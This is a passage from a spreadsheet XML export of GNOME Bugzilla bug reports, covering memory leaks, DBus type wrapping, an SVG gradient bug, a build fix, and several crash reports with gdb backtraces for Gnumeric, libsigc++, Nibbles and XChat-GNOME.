http://cygwinports.sunsite.dk/screenshots/gnome-media.jpg</t>
  </si>
  <si>
    <t>gnome-media-maint</t>
  </si>
  <si>
    <t>EPIPHANY-123337</t>
  </si>
  <si>
    <t>Passwords, Cookies, &amp; Certificates</t>
  </si>
  <si>
    <t>GtkListStore Memory Leak</t>
  </si>
  <si>
    <t>Instances of GtkListStore are causing small memory leaks
GtkListStore is not a child of GtkObject this means that when a new
instance of  model (ref count = 1) is assigned to the GtkTreeView it now
has a ref count of 2 so it is neeeded to unref the model at least on
pdm-dialog.c see:
http://cvs.gnome.org/bonsai/cvsblame.cgi?file=epiphany%2Fsrc/pdm-dialog.c&amp;rev=&amp;root=/cvs/gnome#240
and 
http://cvs.gnome.org/bonsai/cvsblame.cgi?file=epiphany%2Fsrc/pdm-dialog.c&amp;rev=&amp;root=/cvs/gnome#296
after the model has been assigned to the treeview.
an example can be found at
http://cvs.gnome.org/bonsai/cvsblame.cgi?file=gtk%2B%2Fdemos%2Fgtk-demo/list_store.c&amp;rev=&amp;root=/cvs/gnome#199
Note: Maybe it is needed to check another places where GtkTreeView is being
used in order to see if their models are being memory leaked too</t>
  </si>
  <si>
    <t>GJS-619975</t>
  </si>
  <si>
    <t>GJS</t>
  </si>
  <si>
    <t>arrays get wrapped in variants in DBus results</t>
  </si>
  <si>
    <t>It appears that gjs is responsible for wrapping arrays in unnecessary variants in DBus results. This happens for ObserverChannelFilter property of the GNOME Shell Telepathy Client that implements the Observer interface.
The ObserverChannelsFilter is defined in gnome-shell/js/ui/telepathyClient.js as
    get ObserverChannelFilter() {
        return [ singleUserTextChannel oneOrMoreUserTextChannel ]
    }
where e.g.
let singleUserTextChannel = {}
singleUserTextChannel[Telepathy.CHANNEL_NAME + '.ChannelType'] = Telepathy.CHANNEL_TEXT_NAME
singleUserTextChannel[Telepathy.CHANNEL_NAME + '.TargetHandleType'] = Telepathy.HandleType.CONTACT
The signature for the method is defined in gnome-shell/js/misc/telepathy.js as
    properties: [
        { name: 'ObserverChannelFilter'
          signature: 'aa{sv}'
          access: 'read' }
    ]
The output of dbus-monitor shows that the extra variants get added into the result:
method call sender=:1.126 -&gt; dest=org.freedesktop.Telepathy.Client.GnomeShell serial=577 path=/org/freedesktop/Telepathy/Client/GnomeShell interface=org.freedesktop.DBus.Properties member=GetAll
   string org.freedesktop.Telepathy.Client.Observer
method return sender=:1.165 -&gt; dest=:1.126 reply_serial=577
   array [
      dict entry(
         string ObserverChannelFilter
         variant             array [
               variant                   array [
                     dict entry(
                        string org.freedesktop.Telepathy.Channel.TargetHandleType
                        variant                            int32 1
                     )
                     dict entry(
                        string org.freedesktop.Telepathy.Channel.ChannelType
                        variant                            string org.freedesktop.Telepathy.Channel.Type.Text
                     )
                  ]
               variant                   array [
                     dict entry(
                        string org.freedesktop.Telepathy.Channel.TargetHandleType
                        variant                            int32 0
                     )
                     dict entry(
                        string org.freedesktop.Telepathy.Channel.ChannelType
                        variant                            string org.freedesktop.Telepathy.Channel.Type.Text
                     )
                  ]
            ]
      )
   ]
Compare this to the format of a similar filter specification from Empathy:
method return sender=:1.168 -&gt; dest=:1.126 reply_serial=597
   array [
      dict entry(
         string HandlerChannelFilter
         variant             array [
               array [
                  dict entry(
                     string org.freedesktop.Telepathy.Channel.TargetHandleType
                     variant                         int32 0
                  )
                  dict entry(
                     string org.freedesktop.Telepathy.Channel.ChannelType
                     variant                         string org.freedesktop.Telepathy.Channel.Type.Text
                  )
               ]
               array [
                  dict entry(
                     string org.freedesktop.Telepathy.Channel.TargetHandleType
                     variant                         int32 1
                  )
                  dict entry(
                     string org.freedesktop.Telepathy.Channel.ChannelType
                     variant                         string org.freedesktop.Telepathy.Channel.Type.Text
                  )
               ]
               ...
            ]
      )
   ]
The way we were specifying the filter did not cause any problems on F12 but it fails on F13 causing us not to get any message notifications with 'MC_DEBUG=1 /usr/libexec/mission-control-5' indicating:
(process:24923): mcd-DEBUG: _mcd_client_proxy_observer_get_all_cb: org.freedesktop.Telepathy.Client.GnomeShell ObserverChannelFilter absent or wrong type assuming no channels can match</t>
  </si>
  <si>
    <t>gjs-maint</t>
  </si>
  <si>
    <t>marinaz</t>
  </si>
  <si>
    <t>EVOLUTION-234200</t>
  </si>
  <si>
    <t>WM icon not there when opening existant message</t>
  </si>
  <si>
    <t>Description of Problem:
When I double-click on a message or Open it the WM icon displayed is the
default one(i.e. none).  I use Ximian Gnome 1.4.  Did not try it with KDE.
Steps to reproduce the problem:
1. Open an existing message by double-clicking or selecting Open
2. Look at the WM icon displayed for the new window.
Actual Results:
The default WM icon is used instead of one of the Evolution icons.  It's
not consistent with the rest of Evolution.
Expected Results:
The WM should display one of the evolution icons like when you Compose a
new message.
How often does this happen? 
Every time.
Additionnal Information:
I beleive this is a X issue.  One has to specify which icon is used to
identify the window in the WM.  A gtk function does this (which one?).</t>
  </si>
  <si>
    <t>BUG-BUDDY-354287</t>
  </si>
  <si>
    <t>BUG-BUDDY</t>
  </si>
  <si>
    <t>Inconsistent spelling: bugzilla and Bugzilla</t>
  </si>
  <si>
    <t>Please describe the problem:
Bug Buddy sometimes refers to GNOME Bugzilla as Bugzilla sometimes as bugzilla. There should be only one spelling.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:
See also #351006.</t>
  </si>
  <si>
    <t>aasmunds</t>
  </si>
  <si>
    <t>LIBRSVG-124336</t>
  </si>
  <si>
    <t>LIBRSVG</t>
  </si>
  <si>
    <t>SVG import scales gradient wrong</t>
  </si>
  <si>
    <t xml:space="preserve">Just open the SVG Imiage with X- und Y-Ration = 1 und X- und Y-Ration =
1.1. The gradient moves right.
The test image:
&lt;!DOCTYPE svg PUBLIC -//W3C//DTD SVG 20010904//EN
http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd
[
 &lt;!ATTLIST svg
  xmlns:xlink CDATA #FIXED http://www.w3.org/1999/xlink&gt;
]&gt;
&lt;svg
   xmlns=http://www.w3.org/2000/svg
   xmlns:xlink=http://www.w3.org/1999/xlink
   version=1
   x=0.00000000
   y=0.00000000
   width=744.094482
   height=1052.36218
   id=svg573&gt;
  &lt;defs
     id=defs575&gt;
    &lt;linearGradient
       x1=0.00000000
       y1=0.00000000
       x2=1.00000000
       y2=0.00000000
       id=linearGradient577
       gradientUnits=objectBoundingBox
       spreadMethod=pad&gt;
      &lt;stop
         style=stop-color:#000000stop-opacity:1
         offset=0.00000000
         id=stop578 /&gt;
      &lt;stop
         style=stop-color:#ffffffstop-opacity:1
         offset=1.00000000
         id=stop579 /&gt;
    &lt;linearGradient
       x1=0.50344759
       y1=0.46875006
       x2=0.49655175
       y2=0.46875006
       id=linearGradient580
       xlink:href=#linearGradient577
       gradientUnits=objectBoundingBox
       spreadMethod=pad /&gt;
  &lt;ellipse
     cx=422.546387
     cy=475.821136
     rx=174.652481
     ry=155.872650
     transform=translate(-46.4878652.63272)
style=font-size:12fill:url(#linearGradient580)fill-rule:evenoddstroke:#00007fstroke-width:10
     id=path105 /&gt;
</t>
  </si>
  <si>
    <t>librsvg-maint</t>
  </si>
  <si>
    <t>tobias.jakobs</t>
  </si>
  <si>
    <t>ATK-132450</t>
  </si>
  <si>
    <t>gail</t>
  </si>
  <si>
    <t>ATK</t>
  </si>
  <si>
    <t>Crash on pasting text</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: Gnumeric
Severity: normal
Version: GNOME2.4.1 unspecified
Gnome-Distributor: Debian
Synopsis: Crash on pasting text
Bugzilla-Product: Gnumeric
Bugzilla-Component: General
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.4.0.1)
Description:
Description of the crash:
I tried to copy the output of 'df -k' (enclosed below) into gnumeric by
going edit-&gt;paste and selecting space as seperator (and two
seperators as one). But every time gnumeric crashes on the last
screen after pressing next/forward/done (can't remember exactly. This
is the screen where you select the cell type.
It crashes like this each time i try (i've tried 3 times)
/dev/md0               1950784    288364   1662420  15% /
/dev/hda2                77120     17116     60004  23% /boot
/dev/md1              14610048   1803776  12806272  13% /var
/dev/md2              14610048   3056564  11553484  21% /usr
/dev/md3               2400576      2740   2397836   1% /tmp
/dev/md4             190784640  53482588 137302052  29% /home
192.168.0.47:/store   96421300  70353560  26067740  73% /mnt/store
192.168.0.1:/home     33687252  24403980   9283272  73% /mnt/saturn
Debugging Information:
Backtrace was generated from '/usr/bin/gnumeric'
(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ew Thread 1090933248 (LWP 19823)]
(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0x40a8330e in __waitpid_nocancel () from
/lib/tls/libpthread.so.0
#0  0x40a8330e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0x400c1884 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#2  
#3  0x4111e2b7 in gail_tree_view_ref_focus_cell ()
   from /usr/lib/gtk-2.0/modules/libgail.so
#4  0x4111d461 in gail_tree_view_ref_focus_cell ()
   from /usr/lib/gtk-2.0/modules/libgail.so
#5  0x40e22bab in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
#6  0x40e11a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#7  0x40e21c6d in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#8  0x40e20ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#9  0x40e210d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#10 0x40c3c133 in gtk_tree_model_row_deleted ()
   from /usr/lib/libgtk-x11-2.0.so.0
#11 0x081a6a51 in gnumeric_lazy_list_set_rows ()
#12 0x0818dc30 in stf_preview_set_lines ()
#13 0x0818db90 in stf_preview_free ()
#14 0x0818d42c in stf_dialog_format_page_cleanup ()
#15 0x08189395 in stf_dialog ()
#16 0x080bc59a in gnm_go_data_vector_new_expr ()
#17 0x080bca52 in gnm_go_data_vector_new_expr ()
#18 0x40b15489 in gtk_clipboard_set_text () from
/usr/lib/libgtk-x11-2.0.so.0
#19 0x40b91045 in _gtk_marshal_VOID__BOXED_UINT ()
   from /usr/lib/libgtk-x11-2.0.so.0
#20 0x40e11a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#21 0x40e21da6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#22 0x40e20ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#23 0x40e211a7 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#24 0x40bce91d in _gtk_selection_property_notify ()
   from /usr/lib/libgtk-x11-2.0.so.0
#25 0x40bce4d5 in _gtk_selection_notify () from
/usr/lib/libgtk-x11-2.0.so.0
#26 0x40b8f9e4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#27 0x40e11d44 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#28 0x40e11a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#29 0x40e21895 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#30 0x40e20ca3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#31 0x40e210d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#32 0x40c71ca7 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#33 0x40b8e59a in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#34 0x40d4b845 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#35 0x40e61086 in unblock_source () from /usr/lib/libglib-2.0.so.0
#36 0x40e62029 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#37 0x40e62347 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#38 0x40e629b0 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#39 0x40b8dd2f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#40 0x085c1478 in ?? ()
Thread 1 (Thread 1090933248 (LWP 19823)):
#0  0x40a8330e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0x400c1884 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x4111e2b7 in gail_tree_view_ref_focus_cell ()
   from /usr/lib/gtk-2.0/modules/libgail.so
No symbol table info available.
#4  0x4111d461 in gail_tree_view_ref_focus_cell ()
   from /usr/lib/gtk-2.0/modules/libgail.so
No symbol table info available.
#5  0x40e22bab in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#6  0x40e11a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#7  0x40e21c6d in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x40e20ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x40e210d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x40c3c133 in gtk_tree_model_row_deleted ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#11 0x081a6a51 in gnumeric_lazy_list_set_rows ()
No symbol table info available.
#12 0x0818dc30 in stf_preview_set_lines ()
No symbol table info available.
#13 0x0818db90 in stf_preview_free ()
No symbol table info available.
#14 0x0818d42c in stf_dialog_format_page_cleanup ()
No symbol table info available.
#15 0x08189395 in stf_dialog ()
No symbol table info available.
#16 0x080bc59a in gnm_go_data_vector_new_expr ()
No symbol table info available.
#17 0x080bca52 in gnm_go_data_vector_new_expr ()
No symbol table info available.
#18 0x40b15489 in gtk_clipboard_set_text () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#19 0x40b91045 in _gtk_marshal_VOID__BOXED_UINT ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0x40e11a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x40e21da6 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x40e20ec2 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0x40e211a7 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x40bce91d in _gtk_selection_property_notify ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#25 0x40bce4d5 in _gtk_selection_notify () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#26 0x40b8f9e4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#27 0x40e11d44 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x40e11a92 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0x40e21895 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0x40e20ca3 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0x40e210d6 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0x40c71ca7 in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#33 0x40b8e59a in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#34 0x40d4b845 in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#35 0x40e61086 in unblock_source () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#36 0x40e62029 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#37 0x40e62347 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#38 0x40e629b0 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#39 0x40b8dd2f in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x085c1478 in ?? ()
No symbol table info available.
#0  0x40a8330e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-01-25 03:55 -------
Reassigning to the default owner of the component jody@gnome.org.
</t>
  </si>
  <si>
    <t>padraig.obriain</t>
  </si>
  <si>
    <t>GRAPEVINE-40405</t>
  </si>
  <si>
    <t>Grapevine Client Library</t>
  </si>
  <si>
    <t>GRAPEVINE</t>
  </si>
  <si>
    <t>GnoP: virtualize interface loading</t>
  </si>
  <si>
    <t xml:space="preserve">Virtualize the interface loading so that one can use hand generated interfaces
This probably requires one to set up a hash table for string-&gt;widget pointer
resolving.  GnoP will still link with libglade but as it seems gnome-libs2 will
link with libglade anyway so it's not a problem if one wouldn't use it. 
Otherwise perhaps the libglade stuff could be split off so that it doesn't need
to be linked into a project.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:24:28 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:46 -------
Bug blocks bug(s) 40406.
</t>
  </si>
  <si>
    <t>jirka</t>
  </si>
  <si>
    <t>GLIBMM-144420</t>
  </si>
  <si>
    <t>Segfault in libsigc++</t>
  </si>
  <si>
    <t>My application has started to segfault with latest glibmm and libsigc++. A
backtrace with debug symbols from libraries looks like this:
Program received signal SIGSEGV Segmentation fault.
0x082530da in ?? ()
(gdb) bt
#0  0x082530da in ?? ()
#1  0x40666be0 in ~slot_base (this=0x822aee0) at slot_base.h:87
#2  0x406465b4 in (anonymous
namespace)::SourceConnectionNode::destroy_notify_callback (data=0x822aee0) at
main.cc:72
#3  0x407b6818 in g_source_set_callback_indirect ()
   from /usr/lib/libglib-2.0.so.0
#4  0x407b798d in g_main_depth () from /usr/lib/libglib-2.0.so.0
#5  0x407b8a38 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#6  0x407b8d70 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#7  0x407b93b3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#8  0x40440d13 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#9  0x4018d4e9 in Gtk::Main::run_impl () from /usr/lib/libgtkmm-2.4.so.1
#10 0x4018d333 in Gtk::Main::run () from /usr/lib/libgtkmm-2.4.so.1
#11 0x0809b232 in main (argc=2 argv=0xbffff9f4) at main.cpp:48
slot_base.h (libsigc++) line 87 gives me this:
  inline ~slot_rep()
    { if (detach_) (*detach_)(this) }
main.cc (glibmm) line 72 gives me this:
  if (self-&gt;source_)
  {
    GSource* s = self-&gt;source_
    self-&gt;source_ = 0
    g_source_destroy(s)
    delete self // &lt;-- line 72
  }
Unfortunately I havn't had success in providing a simple reproducable example
of application code.</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-360374</t>
  </si>
  <si>
    <t>gnibbles</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED</t>
  </si>
  <si>
    <t>crash in Nibbles: Hosting a new local netw...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Hosting a new local network game.
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 55627776 vsize: 0 resident: 55627776 share: 0 rss: 15847424 rss_rlim: 0
CPU usage: start_time: 1160223872 rtime: 0 utime: 755 stime: 0 cutime:538 cstime: 0 timeout: 217 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/games/gnibbles'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.</t>
  </si>
  <si>
    <t>gnome-games-maint</t>
  </si>
  <si>
    <t>roelhuybrechts</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-459702</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR</t>
  </si>
  <si>
    <t>gcalc does not build against gtk+-2.11.6</t>
  </si>
  <si>
    <t>gcalc does not build against gtk+-2.11.6 because of an evolving API. 
A simple workaround is shown below.
-Joseph
=================================
--- gcalctool-5.19.5/gcalctool/Makefile.in- 2007-07-23 16:06:50.000000000 -0400
+++ gcalctool-5.19.5/gcalctool/Makefile.in  2007-07-23 16:07:02.000000000 -0400
@@ -2597 +2596 @@
    -DGDK_PIXBUF_DISABLE_DEPRECATED \
    -DGDK_DISABLE_DEPRECATED \
    -DGNOME_DISABLE_DEPRECATED \
-   -DGTK_DISABLE_DEPRECATED \
    -DPACKAGE_DATA_DIR=\$(datadir)\ \
    -DPACKAGE_LOCALE_DIR=\$(prefix)/$(DATADIRNAME)/locale\ \
    -DPACKAGE_PIXMAP_DIR=\$(prefix)/$(DATADIRNAME)/pixmaps\ \</t>
  </si>
  <si>
    <t>rich.burridge</t>
  </si>
  <si>
    <t>jsacco</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-354014</t>
  </si>
  <si>
    <t>DESKBAR-APPLET</t>
  </si>
  <si>
    <t>clear_entry both variable and method in DeskbarApplet.py</t>
  </si>
  <si>
    <t>See title</t>
  </si>
  <si>
    <t>deskbar-applet-maint</t>
  </si>
  <si>
    <t>mikkel.kamstrup</t>
  </si>
  <si>
    <t>XCHAT-GNOME-363319</t>
  </si>
  <si>
    <t>XCHAT-GNOME</t>
  </si>
  <si>
    <t>crash in XChat-GNOME IRC Chat: Clicked close in the l...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Clicked close in the left hand server-list-window context window so that the list contained only  then attempted to select reconnect from the same context menu.... caused crash
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 58281984 vsize: 0 resident: 58281984 share: 0 rss: 14991360 rss_rlim: 0
CPU usage: start_time: 1161227965 rtime: 0 utime: 177 stime: 0 cutime:163 cstime: 0 timeout: 14 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/xchat-gnome'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1208338768 (LWP 16471)]
(no debugging symbols found)
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0x4e5f1323 in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0x4f59c1b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x4e5b2379 in __after_morecore_hook () from /lib/tls/i686/cmov/libc.so.6
#5  0x707f5b23 in ?? ()
#6  0xffffffff in ?? ()
#7  0x4e8a60b2 in g_closure_ref () from /usr/lib/libgobject-2.0.so.0
#8  0x4e8b4b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#9  0x4e8a779b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#10 0x4e8b7b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#11 0x4e8b90b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#12 0x4e8b9279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#13 0x4ea9f935 in _gtk_action_emit_activate ()
   from /usr/lib/libgtk-x11-2.0.so.0
#14 0x4eaa07a8 in gtk_action_activate () from /usr/lib/libgtk-x11-2.0.so.0
#15 0x4e8b4b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#16 0x4e8a779b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#17 0x4e8b7b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#18 0x4e8b90b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#19 0x4e8b9279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#20 0x4ec98994 in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
#21 0x4eb8d7d8 in gtk_menu_shell_activate_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
#22 0x4eb8eda2 in gtk_menu_shell_append () from /usr/lib/libgtk-x11-2.0.so.0
#23 0x4eb86995 in gtk_menu_reorder_child () from /usr/lib/libgtk-x11-2.0.so.0
#24 0x4eb80b00 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#25 0x4e8a5fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#26 0x4e8a779b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#27 0x4e8b81e3 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#28 0x4e8b8e7f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#29 0x4e8b9279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#30 0x4ec945f8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
#31 0x4eb79ef3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#32 0x4eb7b0f7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#33 0x4ee3e7ea in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
#34 0x4e7b0802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#35 0x4e7b37df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#36 0x4e7b3b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#37 0x4eb7b574 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#38 0x0806306b in fe_main ()
#39 0x080a0370 in main ()
Thread 1 (Thread -1208338768 (LWP 16471)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0x4e5f1323 in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x4f59c1b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x4e5b2379 in __after_morecore_hook () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#5  0x707f5b23 in ?? ()
No symbol table info available.
#6  0xffffffff in ?? ()
No symbol table info available.
#7  0x4e8a60b2 in g_closure_ref () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x4e8b4b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x4e8a779b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x4e8b7b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x4e8b90b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x4e8b9279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x4ea9f935 in _gtk_action_emit_activate ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#14 0x4eaa07a8 in gtk_action_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#15 0x4e8b4b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x4e8a779b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x4e8b7b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x4e8b90b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x4e8b9279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x4ec98994 in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x4eb8d7d8 in gtk_menu_shell_activate_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0x4eb8eda2 in gtk_menu_shell_append () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x4eb86995 in gtk_menu_reorder_child () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0x4eb80b00 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#25 0x4e8a5fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x4e8a779b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x4e8b81e3 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x4e8b8e7f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0x4e8b9279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0x4ec945f8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x4eb79ef3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x4eb7b0f7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#33 0x4ee3e7ea in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#34 0x4e7b0802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#35 0x4e7b37df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#36 0x4e7b3b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
